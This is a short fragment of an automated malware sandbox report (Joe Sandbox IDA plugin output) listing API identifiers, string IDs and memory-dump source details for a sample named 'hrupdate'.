                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 3521780317-0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: l.dl$ntdl
                                                                • API String ID: 2102423945-1236859653